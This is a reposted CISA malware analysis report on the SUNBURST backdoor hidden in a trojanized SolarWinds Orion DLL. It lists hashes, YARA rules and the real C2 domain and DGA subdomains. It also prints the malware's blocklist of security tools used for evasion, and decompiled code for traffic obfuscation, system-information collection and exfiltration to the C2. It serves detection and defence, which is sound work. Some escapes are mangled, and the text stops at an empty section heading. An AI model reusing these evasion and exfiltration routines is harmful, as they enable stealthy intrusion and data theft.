![MAR-10318845-1.v1 – SUNBURST]()
by Scott Muniz | Feb 8, 2021 | Security, Technology
This article is contributed. See the original author and article here.
This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
Description
This report provides detailed analysis of several malicious artifacts associated with a sophisticated supply chain compromise of SolarWinds Orion network management software, identified by the security company FireEye as SUNBURST.
After being delivered as part of certain SolarWinds updates, a trojanized version of the “solarwinds.orion.core.businesslayer.dll” containing SUNBURST malware is installed by a legitimate SolarWinds installer application. The modified dynamic-link library (DLL) contains an obfuscated backdoor that allows a remote operator to execute various functions on the compromised system, as well as deploy additional payloads and exfiltrate data. The embedded SUNBURST code encrypts its outbound communications to the remote operator using XOR encryption and modified Base64 encoding. To maintain a low profile, the SUNBURST code will not run if it detects certain security software running on the target system.
For a downloadable copy of IOCs, see: MAR-10318845-1.v1.stix.
Submitted Files (4)
019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 (SolarWinds.Orion.Core.Business…)
32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 (SolarWinds.Orion.Core.Business…)
ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 (SolarWinds.Orion.Core.Business…)
d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 (SolarWinds-Core-v2019.4.5220-H…)
Domains (1)
avsvmcloud.com
32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77
Tags
backdoorremote-access-trojantrojan
Details
| Name |
SolarWinds.Orion.Core.BusinessLayer.dll |
| Size |
1011032 bytes |
| Type |
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5 |
b91ce2fa41029f6955bff20079468448 |
| SHA1 |
76640508b1e7759e548771a5359eaed353bf1eec |
| SHA256 |
32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 |
| SHA512 |
6a81f082f36ccbda48070772c5a97e1d7de61ad77465e7befe8cbd97df40dcc5da09c461311708e3d57527e323484b05cfd3e72a3c70e106e47f44cc77584bd7 |
| ssdeep |
12288:Zx7m/z9aEBzvnvLtYAi6uLlYQ69BBpIvF1tjpH7BKi+0A8vca9owQ:6aEBTvRBi6uL6dIvDtjpH9+0A8vca9oD |
| Entropy |
5.582827 |
Antivirus
| Ahnlab |
Backdoor/Win32.SunBurst |
| Antiy |
Trojan[Backdoor]/MSIL.Agent |
| Avira |
TR/Sunburst.AO |
| BitDefender |
Trojan.Sunburst.A |
| Clamav |
Win.Countermeasure.Sunburst-9809152-0 |
| Comodo |
Backdoor |
| Cyren |
W32/Trojan.BCCG-2955 |
| ESET |
a variant of MSIL/SunBurst.A trojan |
| Emsisoft |
Trojan.Win32.Sunburst (A) |
| Ikarus |
Backdoor.Sunburst |
| K7 |
Trojan ( 00574a531 ) |
| Lavasoft |
Trojan.Sunburst.A |
| McAfee |
Trojan-sunburst |
| Microsoft Security Essentials |
Trojan:MSIL/Solorigate.BR!dha |
| NANOAV |
Trojan.Win32.SunBurst.iduxjk |
| Sophos |
Mal/Sunburst-A |
| Symantec |
Backdoor.Sunburst!gen1 |
| Systweak |
trojan-backdoor.sunburst-r |
| TrendMicro |
Backdoo.6F8C6A1E |
| TrendMicro House Call |
Backdoo.6F8C6A1E |
| Vir.IT eXplorer |
Trojan.Win32.SunBurst.A |
| VirusBlokAda |
TScope.Trojan.MSIL |
| Zillya! |
Backdoor.Sunburst.Win32.2 |
YARA Rules
- rule CISA_10318927_01 : trojan rat SOLAR_FIRE
{
meta:
Author = “CISA Code & Media Analysis”
Incident = “10318927”
Date = “2020-12-13”
Last_Modified = “20201213_2145”
Actor = “n/a”
Category = “TROJAN RAT”
Family = “SOLAR_FIRE”
Description = “This signature is based off of unique strings embedded within the modified Solar Winds app”
MD5_1 = “b91ce2fa41029f6955bff20079468448”
SHA256_1 = “32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77”
MD5_2 = “846e27a652a5e1bfbd0ddd38a16dc865”
SHA256_2 = “ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6”
strings:
$s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }
$s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }
$s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41 00 41 00 3D 00 3D }
$s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B 00 53 00 79 00 30 00 42 }
condition:
all of them
}
- rule FireEye_20_00025668_01 : SUNBURST APT backdoor
{
meta:
Author = “FireEye”
Date = “2020-12-13”
Last_Modified = “20201213_1917”
Actor = “n/a”
Category = “Backdoor”
Family = “SUNBURST”
Description = “This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services.”
MD5_1 = “”
SHA256_1 = “”
strings:
$cmd_regex_encoded = “U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA” wide
$cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
$fake_orion_event_encoded = “U3ItS80rCaksSFWyUvIvyszPU9IBAA==” wide
$fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
$fake_orion_eventmanager_encoded = “U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==” wide
$fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
$fake_orion_message_encoded = “U/JNLS5OTE9VslKqNqhVAgA=” wide
$fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
$fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
condition:
$fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) )
}
- rule FireEye_20_00025668_02 : SUNBURST APT backdoor
{
meta:
Author = “FireEye”
Date = “2020-12-13”
Last_Modified = “20201213_1917”
Actor = “n/a”
Category = “Backdoor”
Family = “SUNBURST”
Description = “The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services.”
MD5_1 = “”
SHA256_1 = “”
strings:
$a = “0y3Kzy8BAA==” wide
$aa = “S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA” wide
$ab = “S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=” wide
$ac = “C88sSs1JLS4GAA==” wide
$ad = “C/UEAA==” wide
$ae = “C89MSU8tKQYA” wide
$af = “8wvwBQA=” wide
$ag = “cyzIz8nJBwA=” wide
$ah = “c87JL03xzc/LLMkvysxLBwA=” wide
$ai = “88tPSS0GAA==” wide
$aj = “C8vPKc1NLQYA” wide
$ak = “88wrSS1KS0xOLQYA” wide
$al = “c87PLcjPS80rKQYA” wide
$am = “Ky7PLNAvLUjRBwA=” wide
$an = “06vIzQEA” wide
$b = “0y3NyyxLLSpOzIlPTgQA” wide
$c = “001OBAA=” wide
$d = “0y0oysxNLKqMT04EAA==” wide
$e = “0y3JzE0tLknMLQAA” wide
$f = “003PyU9KzAEA” wide
$h = “0y1OTS4tSk1OBAA=” wide
$i = “K8jO1E8uytGvNqitNqytNqrVA/IA” wide
$j = “c8rPSQEA” wide
$k = “c8rPSfEsSczJTAYA” wide
$l = “c60oKUp0ys9JAQA=” wide
$m = “c60oKUp0ys9J8SxJzMlMBgA=” wide
$n = “8yxJzMlMBgA=” wide
$o = “88lMzygBAA==” wide
$p = “88lMzyjxLEnMyUwGAA==” wide
$q = “C0pNL81JLAIA” wide
$r = “C07NzXTKz0kBAA==” wide
$s = “C07NzXTKz0nxLEnMyUwGAA==” wide
$t = “yy9IzStOzCsGAA==” wide
$u = “y8svyQcA” wide
$v = “SytKTU3LzysBAA==” wide
$w = “C84vLUpOdc5PSQ0oygcA” wide
$x = “C84vLUpODU4tykwLKMoHAA==” wide
$y = “C84vLUpO9UjMC07MKwYA” wide
$z = “C84vLUpO9UjMC04tykwDAA==” wide
condition:
($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))
}
ssdeep Matches
No matches found.
PE Metadata
| Compile Date |
2020-03-24 04:52:34-04:00 |
| Import Hash |
dae02f32a21e03ce65412f6e56942daa |
| Company Name |
SolarWinds Worldwide, LLC. |
| File Description |
SolarWinds.Orion.Core.BusinessLayer |
| Internal Name |
SolarWinds.Orion.Core.BusinessLayer.dll |
| Legal Copyright |
Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved. |
| Original Filename |
SolarWinds.Orion.Core.BusinessLayer.dll |
| Product Name |
SolarWinds.Orion.Core.BusinessLayer |
| Product Version |
2019.4.5200.9083 |
PE Sections
| MD5 |
Name |
Raw Size |
Entropy |
| 9f1dcf8b4df81fdd1e33e8157fb58d9f |
header |
512 |
2.890704 |
| ac9dc455a67c7f2c9f10725d66c115d1 |
.text |
1001472 |
5.569219 |
| 69a064c0b6001299af109ed0d06f6c6f |
.rsrc |
1536 |
3.015713 |
| 275a7e1f11b8e5fefa163e47c22129b4 |
.reloc |
512 |
0.101910 |
Relationships
| 32519b85c0… |
Connected_To |
avsvmcloud.com |
| 32519b85c0… |
Contained_Within |
d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 |
Description
This file is a 32-bit .NET DLL named “SolarWinds.Orion.Core.BusinessLayer.dll.” It is a modified SolarWinds-signed plugin component of the Orion software framework that has been patched with the SUNBURST backdoor. This malicious file was signed with a digital certificate issued by Symantec to SolarWinds. The digital certificate should be considered compromised.
–Begin Digital Certificate Information–
Signer: CN=”Solarwinds Worldwide, LLC”, O=”Solarwinds Worldwide, LLC”, L=Austin, S=Texas, C=US
Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=SymantecCorporation, C=US
SN: 0FE973752022A606ADF2A36E345DC0ED
Not Before: 1/20/2020 7:00:00 PM
Not After: 1/20/2023 6:59:59 PM
Thumbprint: 47D92D49E6F7F296260DA1AF355F941EB25360C4
Status: Valid
StatusMsg: Signature verified.
–End Digital Certificate Information–
SUNBURST provides the following capabilities on a compromised system, which are discussed in further detail below.
– Sets a 12 to 14 day delayed execution time
– Stealth
– Command and Control (C2) communication
– Collect system information
– Upload system information from the victim system
– Run specified tasks
– Terminate processes
– Download, read, write, move, delete, and execute files
– Compute file hashes
– Reboot the system
– Adjust process privileges
**DELAYED EXECUTION**
SUNBURST is executed by a legitimate SolarWinds software application designed to load and run SolarWinds plugins. Once installed, it compares its last write time to a randomly generated value between 288 and 336 hours (12 – 14 days) after the file was written. The malware will sleep until this calculated time frame has passed, after which, the malware will begin C2 sessions to retrieve and execute commands or “Jobs” on behalf of the adversary.
**STEALTH**
SUNBURST uses obfuscated blocklists consisting of hashed process and service names to identify analysis tools and antivirus software components running as processes, services, and drivers. It utilizes a modified version of the FNV-1a hash algorithm to determine if specific processes are running on the target system. It will enumerate and hash the process names of all running processes and compare the generated hashes to a hard-coded blocklist. If no block-listed processes are found, it will attempt to resolve the domain “api.solarwinds.com” to test for network connectivity. If a block-listed process is found, it does not proceed with its C2 session. This evasion technique is used to keep it from being detected. The hard coded hashed process names are stored in an unsigned LONG list named “assemblyTimeStamps.” See “**BLOCK LIST CHECKING FUNCTIONS**” below in this report for details.
–Begin hard-coded list of block-listed processes and names–
1475579823244607677 100-continue
2734787258623754862 accept
1368907909245890092 afwserv
16858955978146406642 apac.lab
2597124982561782591 apimonitor-x64
2600364143812063535 apimonitor-x86
6195833633417633900 aswengsrv
2934149816356927366 aswidsagent
13029357933491444455 aswidsagenta
15194901817027173566 atrsdfw.sys
4821863173800309721 autopsy
13464308873961738403 autopsy64
3320026265773918739 autoruns
12969190449276002545 autoruns64
10657751674541025650 autorunsc
12094027092655598256 autorunsc64
2760663353550280147 avastavwrapper
8146185202538899243 avastsvc
11818825521849580123 avastui
11109294216876344399 avgadminclientservice
2797129108883749491 avgidsagent
3660705254426876796 avgsvc
3890794756780010537 avgsvca
3890769468012566366 avgsvcx
12709986806548166638 avgui
14095938998438966337 avgwdsvcx
13611051401579634621 avp
18147627057830191163 avpui
16423314183614230717 bccavsvc
11913842725949116895 binaryninja
5449730069165757263 blacklight
12679195163651834776 brcow_x_x_x_x.sys
1614465773938842903 brfilter.sys
11385275378891906608 carbonblack
13693525876560827283 carbonblackk
17204844226884380288 cavp
5984963105389676759 cb
17849680105131524334 cbcomms
18246404330670877335 cbstream
292198192373389586 cff explorer
14226582801651130532 close
11266044540366291518 connection
6116246686670134098 content-type
10734127004244879770 cork.lab
18159703063075866524 crexecprev.sys
11771945869106552231 csagent
9234894663364701749 csdevicecontrol
9061219083560670602 csfalconcontainer
8698326794961817906 csfalconservice
12790084614253405985 cutter
16570804352575357627 cve.sys
17097380490166623672 cybkerneltracker.sys
16066522799090129502 date
5219431737322569038 de4dot
15535773470978271326 debugview
11073283311104541690 dev.local
3626142665768487764 dgdmk.sys
7810436520414958497 diskmon
4030236413975199654 dmz.local
13316211011159594063 dnsd
13825071784440082496 dnspy
14480775929210717493 dotpeek32
14482658293117931546 dotpeek64
8473756179280619170 dumpcap
15587050164583443069 eamonm
12718416789200275332 eaw.sys
9559632696372799208 eelam
607197993339007484 egui
14513577387099045298 eguiproxy
4931721628717906635 ehdrv
14079676299181301772 ekbdflt
3200333496547938354 ekrn
2589926981877829912 ekrnepfw
8727477769544302060 emea.sales
17939405613729073960 epfw
17997967489723066537 epfwwfp
3778500091710709090 evidence center
8799118153397725683 exeinfope
8873858923435176895 expect
13783346438774742614 f-secure filter
16112751343173365533 f-secure gatekeeper
17624147599670377042 f-secure gatekeeper handler starter
3425260965299690882 f-secure hips
16066651430762394116 f-secure network request broker
2380224015317016190 f-secure recognizer
13655261125244647696 f-secure webui daemon
12027963942392743532 fakedns
576626207276463000 fakenet
9384605490088500348 fe_avk
15092207615430402812 feelam
6274014997237900919 fekern
3320767229281015341 fewscservice
7412338704062093516 ffdec
682250828679635420 fiddler
13014156621614176974 fileinsight
18150909006539876521 floss
5587557070429522647 fnrb32
12445177985737237804 fsaua
12445232961318634374 fsaus
17017923349298346219 fsav32
9333057603143916814 fsbts
541172992193764396 fsdevcon
10393903804869831898 fsdfw
3413052607651207697 fses
3407972863931386250 fsfw
10545868833523019926 fsgk32
521157249538507889 fsgk32st
3421213182954201407 fsma
15039834196857999838 fsma32
3421197789791424393 fsms
3413886037471417852 fsni
17978774977754553159 fsorsp
14243671177281069512 fsorspclient
14055243717250701608 fssm32
7315838824213522000 fsvista
14971809093655817917 fswebuid
10336842116636872171 gdb
6943102301517884811 groundling32.sys
13544031715334011032 groundling64.sys
397780960855462669 hexisfsmonitor.sys
13260224381505715848 hiew32
12785322942775634499 hiew32demo
17956969551821596225 hollows_hunter
14256853800858727521 idaq
8709004393777297355 idaq64
8129411991672431889 idr
15514036435533858158 if-modified-since
15997665423159927228 ildasm
10829648878147112121 ilspy
9149947745824492274 jd-gui
13852439084267373191 keep-alive
17633734304611248415 ksde
13581776705111912829 ksdeui
4578480846255629462 lab.brno
8381292265993977266 lab.local
3796405623695665524 lab.na
5942282052525294911 lab.rio
17984632978012874803 libwamf.sys
3656637464651387014 lordpe
2717025511528702475 lragentmf.sys
10501212300031893463 microsoft.tri.sensor
155978580751494388 microsoft.tri.sensor.updater
5183687599225757871 msmpeng
10063651499895178962 mssense
3575761800716667678 officemalscanner
4501656691368064027 ollydbg
7701683279824397773 pci.local
10296494671777307979 pdfstreamdumper
14630721578341374856 pe-bear
6461429591783621719 pe-sieve32
6508141243778577344 pe-sieve64
4088976323439621041 pebrowse64
9531326785919727076 peid
10235971842993272939 pestudio
2478231962306073784 peview
9903758755917170407 pexplorer
14710585101020280896 ppee
2810460305047003196 procdump
13611814135072561278 procdump64
2032008861530788751 processhacker
6491986958834001955 procexp
27407921587843457 procexp64
2128122064571842954 procmon
10484659978517092504 prodiscoverbasic
2532538262737333146 psanhost
835151375515278827 psepfilter.sys
6088115528707848728 psuamain
4454255944391929578 psuaservice
8478833628889826985 py2exedecompiler
10463926208560207521 r2agent
7080175711202577138 rabin2
8697424601205169055 radare2
16130138450758310172 ramcapture
7775177810774851294 ramcapture64
700598796416086955 redcloak
9007106680104765185 referer
506634811745884560 reflector
18294908219222222902 regmon
3588624367609827560 resourcehacker
9555688264681862794 retdec-ar-extractor
5415426428750045503 retdec-bin2llvmir
3642525650883269872 retdec-bin2pat
13135068273077306806 retdec-config
3769837838875367802 retdec-fileinfo
191060519014405309 retdec-getsig
1682585410644922036 retdec-idr2pat
7878537243757499832 retdec-llvmir2hll
13799353263187722717 retdec-macho-extractor
1367627386496056834 retdec-pat2yara
12574535824074203265 retdec-stacofin
16990567851129491937 retdec-unpacker
8994091295115840290 retdec-yarac
13876356431472225791 rundotnetdll
18392881921099771407 rvsavd.sys
5132256620104998637 saas.swi
11801746708619571308 safe-agent.sys
14968320160131875803 sbiesvc
14868920869169964081 scdbg
106672141413120087 scylla_x64
79089792725215063 scylla_x86
16335643316870329598 sense
12343334044036541897 sentinelmonitor.sys
5614586596107908838 shellcode_launcher
17291806236368054941 solarwinds.businesslayerhost
3869935012404164040 solarwindsdiagnostics
15267980678929160412 swdev.dmz
1109067043404435916 swdev.local
14111374107076822891 sysmon
3538022140597504361 sysmon64
7175363135479931834 tanium
3178468437029279937 taniumclient
13599785766252827703 taniumdetectengine
6180361713414290679 taniumendpointindex
8612208440357175863 taniumtracecli
8408095252303317471 taniumtracewebsocketclient64
7982848972385914508 task explorer
8760312338504300643 task explorer-64
17351543633914244545 tcpdump
7516148236133302073 tcpvcon
15114163911481793350 tcpview
7574774749059321801 user-agent
15457732070353984570 vboxservice
16292685861617888592 win32_remote
10374841591685794123 win64_remotex64
3045986759481489935 windbg
917638920165491138 windefend
17109238199226571972 windump
5945487981219695001 winhex
6827032273910657891 winhex64
8052533790968282297 winobj
17574002783607647274 wireshark
3341747963119755850 x32dbg
14193859431895170587 x64dbg
15695338751700748390 xagt
640589622539783622 xagtnotif
17683972236092287897 xwforensics
17439059603042731363 xwforensics64
–End hard-coded list of block-listed processes and names–
**COMMAND AND CONTROL**
During runtime, SUNBURST hashes its own parent process name, and compares it to the value 17291806236368054941. If it does not match, the malicious class “OrionImprovementBusinessLayer” will stop executing and the DLL will continue normal activity.
When communicating with its C2, SUNBURST utilizes the Orion Improvement Program (OIP) protocol to disguise network activity as normal SolarWinds Orion traffic. The connection with the C2 server will contain a randomly generated “customer ID” that allows the adversary to track different compromised systems.
To establish C2, it will construct and resolve the subdomains of “avsvmcloud.com” using a domain generation algorithm (DGA). The following format is used to generate the domain name:
–Begin format of the domain name–
.appsync-api.eu-west-1.avsvmcloud.com
.appsync-api.us-west-2.avsvmcloud.com
.appsync-api.us-east-1.avsvmcloud.com
.appsync-api.us-east-2.avsvmcloud.com
–End format of the domain name–
It will attempt to make a Canonical Name (CNAME) query according to different third-level domain names in combination with the DGA to verify the C2 server is accessible before executing its command control session.
–Begin domain names combined with DGA–
6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com
7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com
gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com
ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com
k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com
mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com
–End domain names plus DGA–
Outbound communications are encrypted using an embedded class named “CryptoHelper.” The class contains two functions named “CreateSecureString” and “Base64Encode.” The function “CreateSecureString” creates a random byte and then utilizes this random byte to encode the string provided. The randomly generated byte, used as the XOR key, will be stored at offset 0x00 of the encoded string — allowing the adversary to decrypt the traffic received from this implant. The function “CreateSecureString” takes two arguments, a byte array which will be the data targeted for encryption and a bool variable. If this variable is set to “true” the function will “OR” the generated “XOR” key byte with the value 128 before using it to XOR encode the provided data. It then calls the Base64Encode function to further obfuscate the communication.
–Begin CreateSecureString Function–
private static string CreateSecureString(byte[] data, bool flag)
{
byte[] bytes = new byte[data.Length + 1];
bytes[0] = (byte)new Random().Next(1, (int)sbyte.MaxValue);
if (flag)
bytes[0] |= (byte)128;
for (int index = 1; index < bytes.Length; ++index)
bytes[index] = (byte)((uint)data[index – 1] ^ (uint)bytes[0]);
return Base64Encode(bytes, true);
}
–End CreateSecureString Function–
The Base64Encode function is a modified version of the Base64 algorithm that uses the custom alphabet, “ph2eifo3n5utg1j8d94qrvbmk0sal76c.” This custom Base64 encoding makes it harder to interpret network traffic sent between this malicious implant and the remote C2 server. The custom Base64 alphabet and algorithm utilized would be required to decode the network traffic.
–Begin Base64Encode Function–
private static string Base64Encode(byte[] bytes, bool rt)
{
string str1 = OrionImprovementBusinessLayer.ZipHelper.Unzip(“K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA==”);
string str2 = “”;
uint num1 = 0;
int num2 = 0;
foreach (byte num3 in bytes)
{
num1 |= (uint) num3 << num2;
for (num2 += 8; num2 >= 5; num2 -= 5)
{
str2 += str1[(int) num1 & 31].ToString();
num1 >>= 5;
}
}
if (num2 > 0)
{
if (rt)
num1 |= (uint) (new Random().Next() << num2);
str2 += str1[(int) num1 & 31].ToString();
}
return str2;
}
–End Base64Encode Function–
**COLLECT SYSTEM INFORMATION**
The collection of system description info is carried out by the CollectSystemDescription function.
It will collect the following information:
Victim domain SID
Domain name
Hostname
Username
Operating System (OS) version
System directory
Environment tick count – the time since the system was last rebooted.
public static void CollectSystemDescription(string info, out string result)
{
result = (string) null;
int i = 0;
string domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
domainName;
try
{
string str = ((SecurityIdentifier) new NTAccount(domainName,
OrionImprovementBusinessLayer.ZipHelper.Unzip(Administrator)).Translate(typeof
(SecurityIdentifier))).AccountDomainSid.ToString();
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
str;
}
catch
{
result += OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i);
}
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
IPGlobalProperties.GetIPGlobalProperties().HostName;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
Environment.UserName;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
OrionImprovementBusinessLayer.GetOSVersion(true);
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
Environment.SystemDirectory;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +
(object) (int) TimeSpan.FromMilliseconds((double) (uint)
Environment.TickCount).TotalDays;
result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + info
+ “n”;
result += OrionImprovementBusinessLayer.GetNetworkAdapterConfiguration();
}
The GetNetworkAdapterConfiguration function will gather information on any attached network adapters and their configuration information.
private static string GetNetworkAdapterConfiguration()
{
string str = “”;
try
{
using (ManagementObjectSearcher managementObjectSearcher = new
ManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip(Select *
From Win32_NetworkAdapterConfiguration where IPEnabled=true)))
{
foreach (ManagementObject managementObject in
managementObjectSearcher.Get().Cast<ManagementObject>())
{
str += “n”;
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(Description));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(MACAddress));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPEnabled));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPServer));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSHostName));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSDomainSuffixSearchOrder));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSServerSearchOrder));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(IPAddress));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(IPSubnet));
str +=
OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,
OrionImprovementBusinessLayer.ZipHelper.Unzip(DefaultIPGateway));
}
return str;
}
}
catch (Exception ex)
{
return str + ex.Message;
}
**UPLOAD SYSTEM INFORMATION**
The “UploadSystemDescription” function is used to exfiltrate gathered system information. It parses through HTTP session information to form a full HTTP request that is sent to the remote C2 server. The modified version of the FNV-1a hash algorithm is utilized to hash certain words associated with outbound HTTP requests, such as “accept” (Hash: 2734787258623754862) and “content-type” (Hash: 6116246686670134098). It then parses through the provided HTTP session data using these hash values, rather than HTTP strings, to obfuscate the functionality of this code. This obfuscation makes it more difficult to manually or heuristically identify the functions intent to generate an outbound HTTP session.
–Begin UploadSystemDescription Function–
public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)
{
result = (string) null;
string requestUriString = args[0];
string s1 = args[1];
string s2 = args.Length >= 3 ? args[2] : (string) null;
string[] strArray = Encoding.UTF8.GetString(Convert.FromBase64String(s1)).Split(new string[3]
{
“rn”,
“r”,
“n”
}, StringSplitOptions.None);
HttpWebRequest httpWebRequest1 = (HttpWebRequest) WebRequest.Create(requestUriString);
HttpWebRequest httpWebRequest2 = httpWebRequest1;
httpWebRequest2.set_ServerCertificateValidationCallback(httpWebRequest2.get_ServerCertificateValidationCallback() + (RemoteCertificateValidationCallback) ((sender, cert, chain, sslPolicyErrors) => true));
httpWebRequest1.Proxy = proxy;
httpWebRequest1.Timeout = 120000;
httpWebRequest1.Method = strArray[0].Split(‘ ‘)[0];
foreach (string header in strArray)
{
int length = header.IndexOf(‘:’);
if (length > 0)
{
string headerName = header.Substring(0, length);
string s3 = header.Substring(length + 1).TrimStart((char[]) Array.Empty<char>());
if (!WebHeaderCollection.IsRestricted(headerName))
{
httpWebRequest1.Headers.Add(header);
}
else
{
switch (OrionImprovementBusinessLayer.GetHash(headerName.ToLower()))
{
case 2734787258623754862:
httpWebRequest1.Accept = s3;
continue;
case 6116246686670134098:
httpWebRequest1.ContentType = s3;
continue;
case 7574774749059321801:
httpWebRequest1.UserAgent = s3;
continue;
case 8873858923435176895:
if (OrionImprovementBusinessLayer.GetHash(s3.ToLower()) == 1475579823244607677UL)
{
httpWebRequest1.ServicePoint.Expect100Continue = true;
continue;
}
httpWebRequest1.Expect = s3;
continue;
case 9007106680104765185:
httpWebRequest1.Referer = s3;
continue;
case 11266044540366291518:
ulong hash = OrionImprovementBusinessLayer.GetHash(s3.ToLower());
httpWebRequest1.KeepAlive = hash == 13852439084267373191UL || httpWebRequest1.KeepAlive;
httpWebRequest1.KeepAlive = hash != 14226582801651130532UL && httpWebRequest1.KeepAlive;
continue;
case 15514036435533858158:
httpWebRequest1.set_Date(DateTime.Parse(s3));
continue;
case 16066522799090129502:
httpWebRequest1.set_Date(DateTime.Parse(s3));
continue;
default:
continue;
}
–End UploadSystemDescription Function–
SUNBURST contains functions that give it the ability to run specified tasks, terminate processes, delete files, compute file hashes, and reboot the victim system.
**RUN SPECIFIED TASKS**
